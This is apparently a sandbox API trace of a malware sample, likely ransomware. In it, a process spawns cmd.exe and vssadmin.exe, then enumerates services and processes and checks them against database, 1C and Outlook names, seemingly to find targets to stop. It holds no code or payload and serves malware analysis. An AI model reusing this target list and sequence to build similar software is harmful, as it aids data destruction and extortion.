	[0032.967] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0032.968] lstrlenW (lpString="realistic.exe") returned 13
	[0032.968] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0032.968] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0032.968] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0032.968] lstrlenW (lpString="dllhost.exe") returned 11
	[0032.968] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0032.969] lstrlenW (lpString="dllhost.exe") returned 11
	[0032.969] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0033.560] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0033.561] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0033.561] lstrlenW (lpString="cmd.exe") returned 7
	[0033.561] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0033.562] lstrlenW (lpString="conhost.exe") returned 11
	[0033.562] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0033.562] lstrlenW (lpString="vssadmin.exe") returned 12
	[0033.563] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0033.563] CloseHandle (hObject=0x168) returned 1
	[0033.563] Sleep (dwMilliseconds=0x1f4) 
	[0034.420] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df3198
	[0034.421] EnumServicesStatusExW (in: hSCManager=0x7df3198, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0034.421] GetLastError () returned 0xea
	[0034.421] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x11e4) returned 0xac628f0
	[0034.421] EnumServicesStatusExW (in: hSCManager=0x7df3198, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xac628f0, cbBufSize=0x11e4, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xac628f0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0034.422] CloseServiceHandle (hSCObject=0x7df3198) returned 1
	[0034.422] lstrlenW (lpString="Appinfo") returned 7
	[0034.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0034.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0034.422] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0034.422] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0034.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0034.422] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0034.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0034.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0034.422] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0034.422] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0034.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0034.422] lstrlenW (lpString="AudioSrv") returned 8
	[0034.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0034.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0034.422] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0034.422] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0034.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0034.422] lstrlenW (lpString="BFE") returned 3
	[0034.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0034.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0034.422] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0034.422] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0034.423] lstrlenW (lpString="CryptSvc") returned 8
	[0034.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0034.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0034.423] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0034.423] lstrlenW (lpString="CscService") returned 10
	[0034.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0034.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0034.423] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0034.423] lstrlenW (lpString="DcomLaunch") returned 10
	[0034.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0034.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0034.423] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0034.423] lstrlenW (lpString="Dhcp") returned 4
	[0034.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0034.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0034.423] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0034.423] lstrlenW (lpString="Dnscache") returned 8
	[0034.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0034.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0034.423] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0034.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0034.423] lstrlenW (lpString="DPS") returned 3
	[0034.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0034.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0034.424] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0034.424] lstrlenW (lpString="eventlog") returned 8
	[0034.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0034.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0034.424] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0034.424] lstrlenW (lpString="EventSystem") returned 11
	[0034.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0034.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0034.424] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0034.424] lstrlenW (lpString="gpsvc") returned 5
	[0034.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0034.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0034.424] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0034.424] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0034.424] lstrlenW (lpString="iphlpsvc") returned 8
	[0034.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0034.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0034.424] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0034.424] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0034.424] lstrlenW (lpString="LanmanServer") returned 12
	[0034.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0034.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0034.424] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0034.424] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0034.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0034.424] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0034.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0034.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0034.425] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0034.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0034.425] lstrlenW (lpString="lmhosts") returned 7
	[0034.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0034.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0034.425] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0034.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0034.425] lstrlenW (lpString="MMCSS") returned 5
	[0034.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0034.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0034.425] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0034.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0034.425] lstrlenW (lpString="MpsSvc") returned 6
	[0034.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0034.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0034.425] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0034.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0034.425] lstrlenW (lpString="Netman") returned 6
	[0034.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0034.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0034.425] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0034.425] lstrlenW (lpString="netprofm") returned 8
	[0034.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0034.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0034.425] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0034.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0034.426] lstrlenW (lpString="NlaSvc") returned 6
	[0034.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0034.426] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0034.426] lstrlenW (lpString="nsi") returned 3
	[0034.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0034.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0034.426] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0034.426] lstrlenW (lpString="PcaSvc") returned 6
	[0034.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0034.426] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0034.426] lstrlenW (lpString="PlugPlay") returned 8
	[0034.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0034.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0034.426] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0034.426] lstrlenW (lpString="Power") returned 5
	[0034.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0034.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0034.426] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0034.426] lstrlenW (lpString="ProfSvc") returned 7
	[0034.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0034.426] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0034.426] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0034.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0034.427] lstrlenW (lpString="RpcEptMapper") returned 12
	[0034.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0034.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0034.427] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0034.427] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0034.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0034.427] lstrlenW (lpString="RpcSs") returned 5
	[0034.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0034.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0034.427] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0034.427] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0034.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0034.427] lstrlenW (lpString="SamSs") returned 5
	[0034.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0034.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0034.427] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0034.427] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0034.438] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0034.438] lstrlenW (lpString="Schedule") returned 8
	[0034.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0034.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0034.438] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0034.438] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0034.438] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0034.438] lstrlenW (lpString="SENS") returned 4
	[0034.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0034.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0034.438] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0034.438] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0034.439] lstrlenW (lpString="ShellHWDetection") returned 16
	[0034.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0034.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0034.439] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0034.439] lstrlenW (lpString="Spooler") returned 7
	[0034.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0034.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0034.439] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0034.439] lstrlenW (lpString="SysMain") returned 7
	[0034.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0034.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0034.439] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0034.439] lstrlenW (lpString="Themes") returned 6
	[0034.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0034.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0034.439] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0034.439] lstrlenW (lpString="TrkWks") returned 6
	[0034.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0034.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0034.439] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0034.439] lstrlenW (lpString="UxSms") returned 5
	[0034.439] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0034.439] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0034.439] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0034.440] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0034.440] lstrlenW (lpString="WdiServiceHost") returned 14
	[0034.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0034.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0034.440] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0034.440] lstrlenW (lpString="WdiSystemHost") returned 13
	[0034.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0034.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0034.440] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0034.440] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0034.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0034.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0034.440] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0034.440] lstrlenW (lpString="Winmgmt") returned 7
	[0034.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0034.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0034.440] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0034.440] lstrlenW (lpString="WPDBusEnum") returned 10
	[0034.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0034.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0034.440] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0034.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0034.440] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xac628f0 | out: hHeap=0x7d60000) returned 1
	[0034.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c
	[0035.230] Process32FirstW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0035.230] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0035.231] lstrlenW (lpString="System") returned 6
	[0035.231] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0035.231] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0035.231] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0035.231] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0035.231] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
